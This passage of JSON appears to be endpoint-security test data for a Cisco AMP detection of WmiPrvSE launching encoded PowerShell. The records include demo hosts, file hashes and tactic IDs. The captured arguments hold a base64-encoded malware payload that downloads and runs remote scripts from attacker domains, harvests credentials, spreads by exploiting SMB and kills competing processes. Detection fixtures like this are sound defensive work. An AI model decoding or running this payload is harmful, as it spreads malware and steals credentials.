ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjA